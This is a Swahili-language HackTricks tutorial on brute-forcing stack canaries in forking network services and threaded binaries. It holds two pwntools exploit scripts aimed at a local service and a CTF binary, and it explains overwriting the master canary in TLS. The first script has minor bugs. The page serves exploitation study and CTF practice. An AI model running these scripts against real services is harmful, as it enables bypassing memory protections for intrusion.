BF Forked & Threaded Stack Canaries

Jifunze & zoezi la AWS Hacking:Mafunzo ya HackTricks AWS Red Team Expert (ARTE) Jifunze & zoezi la GCP Hacking: Mafunzo ya HackTricks GCP Red Team Expert (GRTE)

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud github repos.

Ikiwa unakabiliana na binary iliyolindwa na canary na PIE (Position Independent Executable) labda unahitaji kupata njia ya kuzipuuza.

Tambua kwamba checksec inaweza isigundue kuwa binary imekingwa na canary ikiwa ilikompiliwa tuli na haiwezi kutambua kazi. Hata hivyo, unaweza kugundua hii kwa mikono ikiwa unagundua kwamba thamani imesave kwenye stack mwanzoni mwa wito wa kazi na thamani hii inachunguzwa kabla ya kutoka.

Kupuuza Canary kwa Brute Force

Njia bora ya kuzipuuza canary rahisi ni ikiwa binary ni programu inayoforka michakato ya watoto kila wakati unapounda uhusiano mpya nayo (huduma ya mtandao), kwa sababu kila wakati unapounganisha canary ile ile itatumika.

Kwa hivyo, njia bora ya kuzipuuza canary ni kwa kuzipiga kwa nguvu char kwa char, na unaweza kugundua ikiwa byte ya canary iliyoguessed ilikuwa sahihi kwa kuangalia ikiwa programu imeanguka au inaendelea na mtiririko wake wa kawaida. Katika mfano huu, kazi inazipiga kwa nguvu 8 Bytes canary (x64) na kutofautisha kati ya byte iliyoguessed kwa usahihi na byte mbaya tu kwa kuchunguza ikiwa jibu limetumwa na server (njia nyingine katika hali nyingine inaweza kuwa kutumia jaribu/kinyume):

Mfano 1

Mfano huu umetekelezwa kwa 64bits lakini unaweza kutekelezwa kwa urahisi kwa bits 32.

from pwn import *

def connect():
r = remote("localhost", 8788)

def get_bf(base):
canary = ""
guess = 0x0
base += canary

while len(canary) < 8:
while guess != 0xff:
r = connect()

r.recvuntil("Username: ")
r.send(base + chr(guess))

if "SOME OUTPUT" in r.clean():
print "Guessed correct byte:", format(guess, '02x')
canary += chr(guess)
base += chr(guess)
guess = 0x0
r.close()
break
else:
guess += 1
r.close()

print "FOUND:\\x" + '\\x'.join("{:02x}".format(ord(c)) for c in canary)
return base

canary_offset = 1176
base = "A" * canary_offset
print("Brute-Forcing canary")
base_canary = get_bf(base) #Get yunk data + canary
CANARY = u64(base_can[len(base_canary)-8:]) #Get the canary

Mfano wa 2

Hii imeboreshwa kwa bits 32, lakini inaweza kubadilishwa kwa urahisi kuwa bits 64. Pia eleza kwamba kwa mfano huu programu inatarajia kwanza byte kuashiria ukubwa wa matokeo na mzigo.

from pwn import *

# Here is the function to brute force the canary
def breakCanary():
known_canary = b""
test_canary = 0x0
len_bytes_to_read = 0x21

for j in range(0, 4):
# Iterate up to 0xff times to brute force all posible values for byte
for test_canary in range(0xff):
print(f"\rTrying canary: {known_canary} {test_canary.to_bytes(1, 'little')}", end="")

# Send the current input size
target.send(len_bytes_to_read.to_bytes(1, "little"))

# Send this iterations canary
target.send(b"0"*0x20 + known_canary + test_canary.to_bytes(1, "little"))

# Scan in the output, determine if we have a correct value
output = target.recvuntil(b"exit.")
if b"YUM" in output:
# If we have a correct value, record the canary value, reset the canary value, and move on
print(" - next byte is: " + hex(test_canary))
known_canary = known_canary + test_canary.to_bytes(1, "little")
len_bytes_to_read += 1
break

# Return the canary
return known_canary

# Start the target process
target = process('./feedme')
#gdb.attach(target)

# Brute force the canary
canary = breakCanary()
log.info(f"The canary is: {canary}")

Vitambulisho

Vitambulisho vya mchakato huo huo pia vitashiriki ishara sawa ya canary, hivyo itakuwa inawezekana kufanya nguvu ya brute kwa canary ikiwa binary inazalisha wima mpya kila wakati shambulio linatokea.

Zaidi ya hayo, kujaza kijazo katika kazi iliyofungwa iliyolindwa na canary inaweza kutumika kubadilisha canary kuu iliyohifadhiwa kwenye TLS. Hii ni kwa sababu, inaweza kuwa inawezekana kufikia nafasi ya kumbukumbu ambapo TLS inahifadhiwa (na kwa hiyo, canary) kupitia bof kwenye steki ya wima. Kama matokeo, kinga ni bure kwa sababu ukaguzi unatumika na vitambulisho viwili ambavyo ni sawa (ingawa vimebadilishwa). Shambulio hili hutekelezwa katika andiko: http://7rocky.github.io/en/ctf/htb-challenges/pwn/robot-factory/#canaries-and-threads

Angalia pia uwasilishaji wa https://www.slideshare.net/codeblue_jp/master-canary-forging-by-yuki-koike-code-blue-2015 ambao unataja kwamba kawaida TLS inahifadhiwa na mmap na wakati steki ya wima inapoundwa pia inazalishwa na mmap kulingana na hili, ambalo linaweza kuruhusu kujaza kama ilivyoonyeshwa katika andiko la awali.

Mifano na Marejeo Mengine

https://guyinatuxedo.github.io/07-bof_static/dcquals16_feedme/index.html
Biti 64, hakuna PIE, nx, BF canary, andika kwenye kumbukumbu fulani ROP kuita execve na ruka hapo.

PreviousStack Canaries NextPrint Stack Canary

Last updated 4 months ago